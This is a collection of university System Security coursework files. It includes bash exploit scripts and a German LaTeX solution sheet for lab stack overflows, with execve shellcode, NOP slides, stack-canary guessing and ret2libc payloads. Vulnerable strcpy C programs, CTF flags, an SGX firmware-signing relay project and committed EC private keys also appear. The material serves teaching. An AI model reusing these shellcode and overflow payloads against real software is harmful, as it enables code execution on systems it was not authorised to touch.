#1717944098
gdb intro
#1717944117
ls
#1717944130
cp commands find_func
#1717944132
nano find_func
#1717944188
gdb -x find_func
#1717944202
./intro
#1717944204
./intro 5
#1717944207
./intro 6
#1717944208
7
#1717944210
./intro 7
#1717944212
./intro 8
#1717944219
clear
#1717944231
nano find_func
#1717944240
gdb -x find_func
#1717944295
nano find_func
#1717944344
gdb -x find_func
#1717944382
nano find_func
#1717944388
gdb -x find_func
#1717944397
nano find_func
#1717944402
gdb -x find_func
#1717944430
nano find_func
#1717944440
gdb -x find_func
#1717944470
gdb intro
#1717944479
readelf
#1717944487
readelf intro
#1717944516
readelf ßS intro
#1717944519
readelf -S intro
#1717945558
objdump -d intro | awk -v RS= '/^[[:xdigit:]]+ <secret>/'
#1717947140
ls
#1717947141
clear
#1717947141
ls
#1717947166
readelf -S intro
#1717948566
ls
#1717948569
clear
#1717948572
readelf -S intro
#1717948913
man 5 elf
#1717949114
elf
#1717949128
man 5 elf
#1717949898
task check
#1717949902
task info
#1717949906
task help
#1717949922
ls
#1717949924
rm find_func
#1717949925
clear
#1717949926
ls
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ls
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cat commands

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# Lines starting with a '#' symbol are comments
# Do not remove this intial line; it will disable pagination
set pagination off
file intro
break secret
# TODO: your commands go here
r 5
i r eax
stepi 6
# after 5. instruction
i r eax
stepi
# after 6. instruction
i r eax
stepi
# after 7. instruction
i r eax
stepi
# after 8. instruction
i r eax
# continue program to end
continue
# END of your commands
# Do not remove the final quit; it will exit GDB automatically
quit

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@ -16,6 +16,8 @@ _start:
push 0x68736164 ; push the ASCII values for 'dash' onto the stack in reverse order (due to little endian) push 0x68736164 ; push the ASCII values for 'dash' onto the stack in reverse order (due to little endian)
push 0x2f2f2f2f ; push the ASCII values for '////' onto the stack in reverse order " push 0x2f2f2f2f ; push the ASCII values for '////' onto the stack in reverse order "
push 0x6e69622f ; push the ASCII values for '/bin' onto the stack in reverse order " push 0x6e69622f ; push the ASCII values for '/bin' onto the stack in reverse order "
; only multiples of wordsize (here 4 byte) can be pushed onto stack
; therefore four / in the second push
mov ebx, esp ; set ebx to the address of the '/bin////dash' string (top of the stack) mov ebx, esp ; set ebx to the address of the '/bin////dash' string (top of the stack)
mov ecx, eax ; set ecx to NULL (=> char *const _Nullable argv[] is NULL) mov ecx, eax ; set ecx to NULL (=> char *const _Nullable argv[] is NULL)
mov edx, eax ; set edx to NULL (=> char *const _Nullable envp[] is NULL) mov edx, eax ; set edx to NULL (=> char *const _Nullable envp[] is NULL)

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@ -4,7 +4,7 @@
// gcc -o test_shellcode -m32 -fno-stack-protector -fno-pie -z execstack -O0 test_shellcode.c // gcc -o test_shellcode -m32 -fno-stack-protector -fno-pie -z execstack -O0 test_shellcode.c
// Your shellcode goes here // Your shellcode goes here
char *shellcode = "\x90\x90\x90..."; char *shellcode = "\x31\xc0\x50\x68\x64\x61\x73\x68\x68\x2f\x2f\x2f\x2f\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80";
// ------------------------ // ------------------------
int main() int main()

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\documentclass[11pt]{scrartcl}
\usepackage[utf8]{inputenc}
\usepackage[T1]{fontenc}
\usepackage[ngerman]{babel}
\usepackage{lmodern}
\usepackage{graphicx}
\usepackage{listings}
\usepackage{xspace}
\usepackage{amsmath}
\usepackage{algorithm}
\usepackage{algpseudocode}
\usepackage{xifthen}
\usepackage{xcolor}
\usepackage{pdfpages}
\usepackage[a4paper,lmargin={2cm},rmargin={2cm},tmargin={2.5cm},bmargin = {2.5cm},headheight = {4cm}]{geometry}
\usepackage{amsmath,amssymb,amstext,amsthm}
\usepackage[shortlabels]{enumitem}
\usepackage[headsepline]{scrlayer-scrpage}
\pagestyle{scrheadings}
\usepackage{titling}
\usepackage{etoolbox}
\usepackage{tikz}
\usepackage{multirow}
\usepackage{tabularx}
\definecolor{keyword}{rgb}{0.0, 0.0, 1.0}
\definecolor{comment}{rgb}{0.5, 0.5, 0.5}
\definecolor{string}{rgb}{0.6, 0.1, 0.1}
\definecolor{background}{rgb}{0.95, 0.95, 0.95}
\lstset{
language=bash,
backgroundcolor=\color{background},
basicstyle=\ttfamily\small,
keywordstyle=\color{keyword}\bfseries,
commentstyle=\color{comment}\itshape,
stringstyle=\color{string},
tabsize=2,
showspaces=false,
showstringspaces=false,
frame=single,
numbers=left,
numberstyle=\tiny\color{gray},
breaklines=true,
captionpos=b,
escapeinside={(*@}{@*)},
}
\usetikzlibrary{shapes, arrows, calc, automata, arrows.meta, positioning,decorations.pathmorphing,backgrounds,decorations.markings,decorations.pathreplacing, graphs}
\usetikzlibrary{matrix,shapes,arrows,positioning,chains, calc}
\usetikzlibrary{arrows.meta,matrix,shapes,arrows,positioning,chains, calc}
\tikzset{%
initial text={},
state/.style={circle, draw, minimum size=.6cm},
every initial by arrow/.style={-stealth},
every loop/.append style={-stealth},
>=stealth
}
\ohead{\parbox[t]{.5\linewidth}{\raggedleft \theauthor}}
\ihead{System Security, SoSe 24, Assignment \thesheetnr}
% Sheet number
\newcounter{sheetnr}
\newcommand{\sheetnr}[1]{\setcounter{sheetnr}{#1}}
% Exercise environments
\newenvironment{exercise}[2][]{\section*{#2\expandafter\ifstrempty\expandafter{#1}{}{\ #1}}}{}
\newenvironment{subexercises}{\begin{enumerate}[a), font=\bfseries, wide, labelindent=0pt]}{\end{enumerate}}
\newenvironment{subsubexercises}{\begin{enumerate}[i), font=\bfseries, wide, labelindent=0pt]}{\end{enumerate}}
% Makros
% MACRO for whole diagram
% #1: total width of diagram
% #2: total height of diagram
% #3: nodes, paths, ...
\newcommand\protocolflow[3]{
\begin{center}
\begin{tikzpicture}[x=#1cm,y=#2cm]
#3
\end{tikzpicture}
\end{center}
}
% MACRO for path line shortening
% #1: start coordinate
% #2: target coordinate
% #3: text above arrow
\newcommand{\package}[3]{
\path[*-{latex[width=5pt, length=5pt]}] (#1) edge node [above] {#3} (#2);
}
% Anpassen --> %
\author{Benjamin Haschka\\Sascha Tommasone\\Paul Zinselmeyer}
\sheetnr{6}
% <-- Anpassen %
\begin{document}
\begin{exercise}[Smashing the Stack for Fun and Profit]{5}
\begin{subexercises}
\item Wenn das Programm mit dem Kommandozeilenargument \\ \lstinline{$(printf "AAAAAAAAAAAAAAAAAAAAAAAA\xBA\xB0\xBA\xB0")} aufgerufen wird, wird der Kontrollfluss wie gewünscht geändert.
\begin{tabular}{ |c|c||c|c|c|c||c|c|c|c| }
\hline
Vorheriger Speicher & Größe & \multicolumn{4}{|c||}{Vorheriger Speicher} & \multicolumn{4}{|c|}{Vorheriger Speicher}\\
\hline
Vorheriger Stackframe&&?&?&?&? & ?&?&?&?\\
\hline
Parameter password & 4 &BE&BA&FE&CA & 0&BA&FE&CA\\
\hline
Return Address & 4 & ?&?&?&? & BA&B0&BA&B0\\
\hline
Previous Frame Address & 4 & ?&?&?&? & 'A'&'A'&'A'&'A'\\
\hline
&&?&?&?&? & 'A'&'A'&'A'&'A'\\
\hline
&&?&?&?&? & 'A'&'A'&'A'&'A'\\
\hline
&&?&?&?&? & 'A'&'A'&'A'&'A'\\
\hline
&&?&?&?&? & 'A'&'A'&'A'&'A'\\
\hline
&&'E'&'F'&0&? & 'A'&'A'&'A'&'A'\\
\hline
Local Variable padded\_password & 24 & 'A'&'B'&'C'&'D' & 'A'&'A'&'A'&'A'\\
\hline
Freier Speicher & & \multicolumn{4}{|c||}{Freier Speicher} & \multicolumn{4}{|c|}{Freier Speicher}\\
\hline
\end{tabular}
\item Mit dem Kommandozeilenargument \lstinline{$(printf "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80AAAAAAA\xEF\xBE\xDE\xC0")} wird der Shellcode in \\ \lstinline{padded_password} an Position \lstinline{0xC0DEBEEF} ausgeführt.
Sollte sich \lstinline{padded_password} an einer anderen Position im Speicher befinden, funktioniert der Angriff nicht, da der Shellcode gar nicht, oder nur teilweise ausgeführt wird.
\item \lstinline{strcpy(3p)}\footnote{https://www.man7.org/linux/man-pages/man3/strcpy.3p.html} berücksichtigt nicht die maximale Länge des Zielspeichers.
Die Funktion \\ \lstinline{strncpy(3p)}\footnote{https://www.man7.org/linux/man-pages/man3/strncpy.3p.html} berücksichtigt die maximale Länge des Zielspeichers, indem dessen Länge als Parameter an die Funktion übergeben wird.
\lstinline{strncpy(3p)} schreibt niemals (inklusive Nullbyte) über den angegebenen Speicherbereich hinaus.
Konkret muss in diesem Fall die Zeile 12 \lstinline{strcpy(padded_password, password);} durch \lstinline{strncpy(padded_password, password, 24);} getauscht werden, um die Sicherheitslücke zu schließen.
\end{subexercises}
\end{exercise}
\begin{exercise}[Stack-Based Buffer Overflow]{6}
\begin{subexercises}
\item Mit dem folgenden Script wird eine Eingabe für das Programm generiert, sodass eine Shell ausgeführt wird. Die Flag lautet \lstinline|flag{THAT_WAS_EASY_HUH}|.\\
\begin{lstlisting}[language=Bash]
#!/usr/bin/env sh
# 21 Byte Shellcode
SHELLCODE="\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
# Padding to fill:
# - 79 Bytes to fill buff
# - 8 Bytes to fill the local variables before buff
# - 4 Bytes to fill the saved ebp value
PADDING=$(printf "A%.0s" $(seq 1 91))
# Address of the start of the buff array / shellcode
RETADDR="\x1C\xDB\xFF\xFF"
printf $SHELLCODE$PADDING$RETADDR
\end{lstlisting}
\item Die Flag lautet \lstinline|flag{THEY_SEE_ME_SLIDIN_THEY_HATIN}|.\\
\end{subexercises}
\end{exercise}
\end{document}

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#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// vulnerable function
int overflow_me(char* input)
{
char buff[100];
printf("Buffer is at %p\n", &buff); // buff's address is leaked :O
strcpy(buff, input);
return 1;
}
int main(int argc, char *argv[])
{
if(argc < 2)
{
printf("Syntax: %s <input string>\n", argv[0]);
exit (0);
}
overflow_me(argv[1]);
return 0;
}

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flag{THAT_WAS_EASY_HUH}

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#!/bin/bash
# flag{THAT_WAS_EASY_HUH}
######### Exploit #########
# Step 1: Write the provided shellcode to stdout
printf "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
# Step 2: Fill the buffer with 'A's until the stored EIP is reached
printf "A%.0s" {1..91}
# Step 3: Overwrite the stored EIP with the address of the shellcode
printf "\x2c\xd5\xff\xff"
###########################

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flag{CANARY_IS_ALSO_AN_ISLAND}

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#!/bin/bash
# flag{CANARY_IS_ALSO_AN_ISLAND}
##### Exploit Creation Steps #####
# Step 1: Locate address of 'int stack_canaries [10]' using gdb
# Command: disas owerflow
# -> 0x56559020
##################################
# Step 2: Print all 10 possible stack canaries in gdb
# Command: x/10xw 0x56559020
##################################
# Step 3: Select only those canaries that do not contain a null byte
##################################
# Step 4: Combine Slide Rider with the selected stack canaries
##################################
############ Exploit ##############
# Step 1: Choose a random canary candidate and overwrite the buffer with 'A's, then insert the canary candidate.
# Note: Only canaries without null bytes can be used due to the use of strcpy.
case $(( RANDOM % 3 )) in
0)
printf "AAAAAAAAAAAAAAAA\xa9\x67\xa3\x70"
;;
1)
printf "AAAAAAAAAAAAAAAA\xc1\xd1\xce\x4b"
;;
2)
printf "AAAAAAAAAAAAAAAA\x0e\x8b\xba\x08"
;;
esac
# Step 2: Fill the buffer with a candidate return address
printf "\x10\xd6\xff\xff%.0s" {1..30}
# Step 3: Write a lot of NOPs to stdout as a slide for the shellcode
printf "\x90%.0s" {1..2000}
# Step 4: Write the provided shellcode to stdout
printf "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
###################################

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#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int vuln(char* input) {
char buff[100];
strcpy(buff, input);
return 0;
}
int main(int argc, char *argv[])
{
if(argc < 2)
{
printf("Syntax: %s <input string>\n", argv[0]);
exit (0);
}
vuln(argv[1]);
return 0;
}

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#!/bin/bash
# sources: https://www.ired.team/offensive-security/code-injection-process-injection/binary-exploitation/return-to-libc-ret2libc
##### Exploit Creation Steps #####
###################################
# Step 1: Locate the offset of the string '/bin/sh' in libc
# Command: strings -a -t x /usr/lib32/libc-2.31.so | grep /bin/sh
# ---> 0x18c363
# Step 2: Determine the base address of libc in the ret2libc environment using gdb
# Command: info proc map
# ---> 0xf7dd4000
# Step 3: Find the addresses of 'system' and 'exit' functions using gdb
# Commands:
# p system -> 0xf7e15360
# p exit -> 0xf7e07ec0
###################################
############ Exploit ##############
# Fill the buffer with 'A's until the stored EIP is reached
printf "A%.0s" {1..112}
# Overwrite the stored EIP with the address of 'system' function
# Place the address of 'exit' function as the return address for 'system'
# Provide the argument for 'system' which is the address of the string '/bin/sh' (calculated as base libc + offset)
# All addresses are in little-endian format
printf "\x60\x53\xe1\xf7\xc0\x7e\xe0\xf7\x63\x03\xf6\xf7"
###################################

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#!/bin/bash
##### Exploit Creation Steps #####
###################################
# Step 1: Find the addresses of 'system' and 'exit' functions using gdb
# Commands:
# p system -> 0xf7e15360
# p exit -> 0xf7e07ec0
# Step 2: Export an environment variable to inject our command as a string into the ret2libc executable
# Command: export COMMAND="echo 100 > /home/user/t0p_s3cr3t/owned"
# Step 3: Find the address of the environment variable string in memory using gdb
# Command: x/s *((char **)environ+16) (17th env. variable)
# Add 8 to the address to skip the 'COMMAND=' part
# -> 0xffffdeda (0xffffdee8 in gdb; different env. vars when executing ./ret2libc directly; found by trial and error)
###################################
############ Exploit ##############
# Fill the buffer with 'A's until the stored EIP is reached
printf "A%.0s" {1..112}
# Overwrite the stored EIP with the address of the 'system' function
# Place the address of the 'exit' function as the return address for 'system'
# Provide the argument for 'system', which is the address of the value of the environment variable COMMAND
# All addresses are in little-endian format
printf "\x60\x53\xe1\xf7\xc0\x7e\xe0\xf7\xda\xde\xff\xff"
###################################

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flag{THEY_SEE_ME_SLIDIN_THEY_HATIN}

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#!/bin/bash
# sources: https://hg8.sh/posts/binary-exploitation/buffer-overflow-code-execution-by-shellcode-injection/
# flag{THEY_SEE_ME_SLIDIN_THEY_HATIN}
######### Exploit #########
# Step 1: Fill the buffer with a candidate return address
printf "\x0c\xd6\xff\xff%.0s" {1..30}
# Step 2: Write a lot of NOPs to stdout as a slide for the shellcode
printf "\x90%.0s" {1..2000}
# Step 3: Write the provided shellcode to stdout
printf "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
###########################

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#!/usr/bin/env sh
# slide for buffer size 20 + 2 bytes of saved ebp
SLIDE_1=$(printf "\\\\x90%.0s" $(seq 1 22))
# jump over the ret addr
JMP_OVER_RET="\xeb\x04"
RET_ADDR="\x08\xdc\xff\xff"
# main nop slide (500 Bytes)
SLIDE_2=$(printf "\\\\x90%.0s" $(seq 1 500))
SHELLCODE="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80"
printf $SLIDE_1$JMP_OVER_RET$RET_ADDR$SLIDE_2$SHELLCODE

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GNU GENERAL PUBLIC LICENSE
Version 3, 29 June 2007
Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The GNU General Public License is a free, copyleft license for
software and other kinds of works.
The licenses for most software and other practical works are designed
to take away your freedom to share and change the works. By contrast,
the GNU General Public License is intended to guarantee your freedom to
share and change all versions of a program--to make sure it remains free
software for all its users. We, the Free Software Foundation, use the
GNU General Public License for most of our software; it applies also to
any other work released this way by its authors. You can apply it to
your programs, too.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
them if you wish), that you receive source code or can get it if you
want it, that you can change the software or use pieces of it in new
free programs, and that you know you can do these things.
To protect your rights, we need to prevent others from denying you
these rights or asking you to surrender the rights. Therefore, you have
certain responsibilities if you distribute copies of the software, or if
you modify it: responsibilities to respect the freedom of others.
For example, if you distribute copies of such a program, whether
gratis or for a fee, you must pass on to the recipients the same
freedoms that you received. You must make sure that they, too, receive
or can get the source code. And you must show them these terms so they
know their rights.
Developers that use the GNU GPL protect your rights with two steps:
(1) assert copyright on the software, and (2) offer you this License
giving you legal permission to copy, distribute and/or modify it.
For the developers' and authors' protection, the GPL clearly explains
that there is no warranty for this free software. For both users' and
authors' sake, the GPL requires that modified versions be marked as
changed, so that their problems will not be attributed erroneously to
authors of previous versions.
Some devices are designed to deny users access to install or run
modified versions of the software inside them, although the manufacturer
can do so. This is fundamentally incompatible with the aim of
protecting users' freedom to change the software. The systematic
pattern of such abuse occurs in the area of products for individuals to
use, which is precisely where it is most unacceptable. Therefore, we
have designed this version of the GPL to prohibit the practice for those
products. If such problems arise substantially in other domains, we
stand ready to extend this provision to those domains in future versions
of the GPL, as needed to protect the freedom of users.
Finally, every program is threatened constantly by software patents.
States should not allow patents to restrict development and use of
software on general-purpose computers, but in those that do, we wish to
avoid the special danger that patents applied to a free program could
make it effectively proprietary. To prevent this, the GPL assures that
patents cannot be used to render the program non-free.
The precise terms and conditions for copying, distribution and
modification follow.
TERMS AND CONDITIONS
0. Definitions.
"This License" refers to version 3 of the GNU General Public License.
"Copyright" also means copyright-like laws that apply to other kinds of
works, such as semiconductor masks.
"The Program" refers to any copyrightable work licensed under this
License. Each licensee is addressed as "you". "Licensees" and
"recipients" may be individuals or organizations.
To "modify" a work means to copy from or adapt all or part of the work
in a fashion requiring copyright permission, other than the making of an
exact copy. The resulting work is called a "modified version" of the
earlier work or a work "based on" the earlier work.
A "covered work" means either the unmodified Program or a work based
on the Program.
To "propagate" a work means to do anything with it that, without
permission, would make you directly or secondarily liable for
infringement under applicable copyright law, except executing it on a
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To "convey" a work means any kind of propagation that enables other
parties to make or receive copies. Mere interaction with a user through
a computer network, with no transfer of a copy, is not conveying.
An interactive user interface displays "Appropriate Legal Notices"
to the extent that it includes a convenient and prominently visible
feature that (1) displays an appropriate copyright notice, and (2)
tells the user that there is no warranty for the work (except to the
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How to Apply These Terms to Your New Programs
If you develop a new program, and you want it to be of the greatest
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the "copyright" line and a pointer to where the full notice is found.
<one line to give the program's name and a brief idea of what it does.>
Copyright (C) <year> <name of author>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
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(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
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You should have received a copy of the GNU General Public License
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Also add information on how to contact you by electronic and paper mail.
If the program does terminal interaction, make it output a short
notice like this when it starts in an interactive mode:
<program> Copyright (C) <year> <name of author>
This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
This is free software, and you are welcome to redistribute it
under certain conditions; type `show c' for details.
The hypothetical commands `show w' and `show c' should show the appropriate
parts of the General Public License. Of course, your program's commands
might be different; for a GUI interface, you would use an "about box".
You should also get your employer (if you work as a programmer) or school,
if any, to sign a "copyright disclaimer" for the program, if necessary.
For more information on this, and how to apply and follow the GNU GPL, see
<https://www.gnu.org/licenses/>.
The GNU General Public License does not permit incorporating your program
into proprietary programs. If your program is a subroutine library, you
may consider it more useful to permit linking proprietary applications with
the library. If this is what you want to do, use the GNU Lesser General
Public License instead of this License. But first, please read
<https://www.gnu.org/licenses/why-not-lgpl.html>.

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@ -0,0 +1,75 @@
# Signature Relay for firmware
Documentation of the Assignment 7 in Systems Security at Ruhr-Universität Bochum.
This is a program, that uses a TEE to build a signature relay to sign firmware with a master key.
For more informationm, read the [project description](doc/abgabe.pdf).
We recommend viewing the [repository](https://git.pfzetto.de/RubNoobs/Systemsicherheit/src/branch/master/Assignment%207%20-%20SGX%20Hands-on) we worked on together at.
## Requirements
You will need the latest version of OpenSSL.
Execute the following command inside the src directory to automatically meet all requirements.
```bash
$ ./setup
```
## Compiling
This project can be compiled for simulation environments or directly on the hardware.
1. **Simulated environment**
In the src directory type the command
```bash
$ make SGX_MODE=SIM
```
2. **Hardware**
In the src directory type the command
```bash
$ make
```
That creates all the necessary objects and binaries to execute.
The executable binary will be `src/signatureproxy`.
## Running
## Running story
To execute an example usage of the project, execute `./simulate` in src directory.
Note, that this will only work, if you sucessfully compiled the project.
## Manual Usage
### Setup
Go to the `src` directory.
Initialize the Enclave keypair by executing:
`./signatureproxy proxysetup -pkey <sealed_proxy_key.bin> > <proxy_public_key.pem>`
### Sign
1. Create employee signature using `./signatureproxy employee -firm <firmware.bin> -ekey <employee_privat_key.pem> > <employee_signature.der>`
This step can also be done using OpenSSL: `openssl dgst -sha256 -sign <employee_private_key.pem> -out <employee_signature.der> -in <firmware.bin>`
2. Use the signature proxy to resign the firmware using `./signatureproxy proxy -pkey <sealed_proxy_key.bin> -epub <employee_public_key.der> -firm <firmware.bin> > <proxy_signature.der>`
The enclave verifies the employee signature and signs the firmware if the signature is valid.
3. Verify signature using `cat <proxy_signature.der> | ./signatureproxy embedded -firm <firmware.bin> -ppub <proxy_public_key.pem>`
This step can also be done using OpenSSL: `openssl dgst -sha256 -verify <proxy_public_key.pem> -signature <proxy-signature.der> <firmware.bin>`
## License
Everything we did ourselves is licensed under the [GNU GPLv3 License](./LICENSE)
## Contributors
- Benjamin Haschka
- Sascha Tommasone
- Paul Zinselmeyer

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@ -0,0 +1,131 @@
#let conf(
title: none,
assignmentno: none,
authors: (),
doc
) = {
set page(
paper: "a4",
header: [
#set text(size: 9pt)
#grid(
columns: 3,
gutter: 1fr,
rows: 1,
align(left + horizon, smallcaps(title)),
align(center + horizon, "Assignment-" + assignmentno),
grid(
align: right,
columns: 1,
rows: authors.len(),
row-gutter: 3pt,
..authors.map(author => [
#author
])
)
)
#line(length: 100%)
],
footer: context [
#line(length: 100%)
#set align(center)
#counter(page).display(
"1 / 1",
both: true
)
],
)
set text(
size: 11pt,
font: "DejaVu Serif"
)
doc
}
#show: doc => conf(
title: "System Security",
assignmentno: "7",
authors: (
"Benjamin Haschka",
"Sascha Tommasone",
"Paul Zinselmeyer"
),
doc
)
= Firmware Signatur-Relay in einer TEE
Das Program hat den Zweck, Signaturen die von einzelnen Nutzern über eine Firmware gemacht werden, mit einem permanenten Produktions-Key zu maskieren, ohne, dass der Nutzer diesen kennt.
Dabei wird eine Encalve als Signatur-Relay verwendet.
Die Enclave kann Signaturen über Daten mit einem festen Satz an öffentlichen Schlüsseln, die vertrauenswürdig sind, verifizieren.
Wenn die Signatur gültig ist, entfernt die Enclave die Signatur und erzeugt eine eigene Signatur mit dem Produktions-Key.
#grid(
columns: 2,
figure(
image("correct-signature.png"),
caption: "Valid Signature"
),
figure(
image("unknown-signature.png"),
caption: "Invalid Signature"
)
)
Diese Signatur kann dann mit dem öffentlichen Schlüssel der Enclave, der von außen angefragt werden kann, überprüft werden.
Damit kann der Nutzer seine eigene Signatur mit der Signatur der Enclave maskieren.
Der Schlüssel ist dabei den Nutzern nie bekannt.
Sie haben den Schlüssel nur versiegelt und können ihn der Enclave geben, die den Schlüssel dann entsiegeln und in der vertrauenswürdigen Umgebung verwenden kann.
== Szenario
In diesem Szenario wird ein Unternehmen betrachtet, das Embedded Geräte produziert.
Für die Geräte sollen regelmäßig Updates für die Firmware veröffentlicht werden.
Diese Firmware muss mit einem permanenten Key signiert werden, der in der Produktion der Geräte fest codiert wird.
Ist die Signatur nicht vorhanden, lädt keines der Geräte das Update.
Mitarbeitende, die die Firmware hochladen wollen, müssen also die implementierte Firmware mit dem Produktions-Key signieren.
Wenn sie den Produktions-Key besitzen, bringt das gewissen risiken, z.B.:
- Mitarbeitende können (absichtilich oder nicht) den Schlüssel veröffentlichen
- Mitarbeitende, die nicht mehr in dem Unternehmen arbeiten, können den Key für schlechte Zwecke missbrauchen
Es ist also sinnvoll, wenn die Mitarbeitende den Key nicht kennen. Dazu kann das beschriebene Signatur-Relay verwendet werden.
Die Mitarbeitenden signieren die Firmware vorerst mit ihrem eigenen Key.
Diese Keys sind in das Relay als trusted Keys eingebunden.
Anschließend kann der Mitarbeitende die selbst-signierte Firmware an das Signatur-Relay senden.
Das Relay prüft dann die Gültigkeit der Signatur und schickt, falls gültig, eine eigene Signatur über die Firmware zurück.
Damit kann dann der Mitarbeitende die Firmware an die Embedded Geräte senden, bei Gültigkeit die neue Firmware laden können.
Falls ein Mitarbeitender den eigenen Schlüssel verlieren oder veröffentlichen sollte, besteht in dem Fall auch nicht das Problem, dass der Produktionsschlüssel ungültig wird.
Es kann einfach der Schlüssel des Mitarbeitenden von der Liste der trusted Keys zurückgezogen werden.
Zudem ist es wichtig, dass keine bösartigen Programme auf den Systemen der Mitarbeitenden den Signaturprozess mitbekommen oder gar verändern können.
Aus diesen Gründen ist es in diesem Szenario wichtig, dass das Relay mit all seinen Funktionen besonders geschützt ist.
Dementsprechend sollte es in einer Enclave laufen.
== Details
1. *Key Management*
Das Key Management wird mit der eingebauten `seal` Funktion der Encalve gemacht.
Dabei kann jeder Nutzer eine versiegelte Kopie des Schlüssels behalten, da er damit nichts anfangen kann.
Erst, wenn der Schlüssel in die Enclave kommt und entsiegelt wird, kann der Schlüssel verwendet werden.
2. *Signatur Erstellung*
Die Enclave bietet eine Schnittstelle für Signaturen mit ECDSA an.
Dabei wird die Kurve secp256r1 verwendet.
== Vorteile
Dieses Programm bietet einige Vorteile, unter anderem:
- Nutzern unbekannter Hauptschlüssel
- Vereinfacht das Zurückziehen der Schlüssel
- Sicherheit der Gültigkeit der Firmware

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-----BEGIN EC PRIVATE KEY-----
MHcCAQEEIH0KXxaw/nRzJU5evlEJQrciYUtfJ16PILWtlA5KKh/koAoGCCqGSM49
AwEHoUQDQgAEduVQXmH1K+ocSSnv0l9PKdC2+xxPQrVyABAYGk+jlo2hugpH8aWk
nfR9cTTOLy6T7ASx3a22S6DftcTz+aZYsg==
-----END EC PRIVATE KEY-----

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@ -0,0 +1,4 @@
-----BEGIN PUBLIC KEY-----
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEduVQXmH1K+ocSSnv0l9PKdC2+xxP
QrVyABAYGk+jlo2hugpH8aWknfR9cTTOLy6T7ASx3a22S6DftcTz+aZYsg==
-----END PUBLIC KEY-----

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@ -0,0 +1,5 @@
-----BEGIN EC PRIVATE KEY-----
MHcCAQEEICV85UuIaBKQ9yisKQne4i4E3HjB4KysQdqnhnrX8LtLoAoGCCqGSM49
AwEHoUQDQgAE7iz5LravULyrYQgu9rIX7iyUQdi7GTJ63Af/DlIrcpy7UbpWdh0O
h5LGlfaMgQ4pq9ORF8+K3LCUYMqUtS+EjA==
-----END EC PRIVATE KEY-----

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@ -0,0 +1,4 @@
-----BEGIN PUBLIC KEY-----
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE7iz5LravULyrYQgu9rIX7iyUQdi7
GTJ63Af/DlIrcpy7UbpWdh0Oh5LGlfaMgQ4pq9ORF8+K3LCUYMqUtS+EjA==
-----END PUBLIC KEY-----

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@ -0,0 +1,5 @@
-----BEGIN EC PRIVATE KEY-----
MHcCAQEEINtBCS3yRqZNxO+RPdV2618QVDfhqmXheAQ9G3hMmxLyoAoGCCqGSM49
AwEHoUQDQgAEzkxblxb/svE5kta/IdNs0NQgDk7CO5nBs/LVeiJDz2iiFwERK6u7
oNj36jvwppi3jFmHp7nFNZEzim45DcY7vA==
-----END EC PRIVATE KEY-----

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@ -0,0 +1,4 @@
-----BEGIN PUBLIC KEY-----
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEzkxblxb/svE5kta/IdNs0NQgDk7C
O5nBs/LVeiJDz2iiFwERK6u7oNj36jvwppi3jFmHp7nFNZEzim45DcY7vA==
-----END PUBLIC KEY-----

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@ -0,0 +1,27 @@
{
"nodes": {
"nixpkgs": {
"locked": {
"lastModified": 1719838683,
"narHash": "sha256-Zw9rQjHz1ilNIimEXFeVa1ERNRBF8DoXDhLAZq5B4pE=",
"owner": "NixOS",
"repo": "nixpkgs",
"rev": "d032c1a6dfad4eedec7e35e91986becc699d7d69",
"type": "github"
},
"original": {
"owner": "NixOS",
"ref": "nixos-24.05",
"repo": "nixpkgs",
"type": "github"
}
},
"root": {
"inputs": {
"nixpkgs": "nixpkgs"
}
}
},
"root": "root",
"version": 7
}

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@ -0,0 +1,50 @@
{
description = "SignatureProxy SGX Demo";
inputs = {
nixpkgs.url = "github:NixOS/nixpkgs/nixos-24.05";
};
outputs = { self, nixpkgs, ... }:
let
lastModifiedDate = self.lastModifiedDate or self.lastModified or "19700101";
version = builtins.substring 0 8 lastModifiedDate;
nixpkgsFor = system: import nixpkgs { inherit system; overlays = [ self.overlay ]; };
in
{
overlay = final: prev: with final; {
signatureProxy = stdenv.mkDerivation {
pname = "SignatureProxy";
inherit version;
src = ./src;
buildPhase = ''
make
'';
installPhase = ''
mkdir -p $out/bin
cp signatureproxy $out/bin
cp enclave.signed.so $out/bin
'';
nativeBuildInputs = with pkgs; [
clang
glibc
sgx-sdk
openssl.dev
pkg-config
which
];
env = {
SGX_SDK = pkgs.sgx-sdk;
SGX_MODE = "SIM";
};
};
};
defaultPackage."x86_64-linux" = (nixpkgsFor "x86_64-linux").signatureProxy;
};
}

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@ -0,0 +1,249 @@
#
# Copyright (C) 2011-2018 Intel Corporation. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
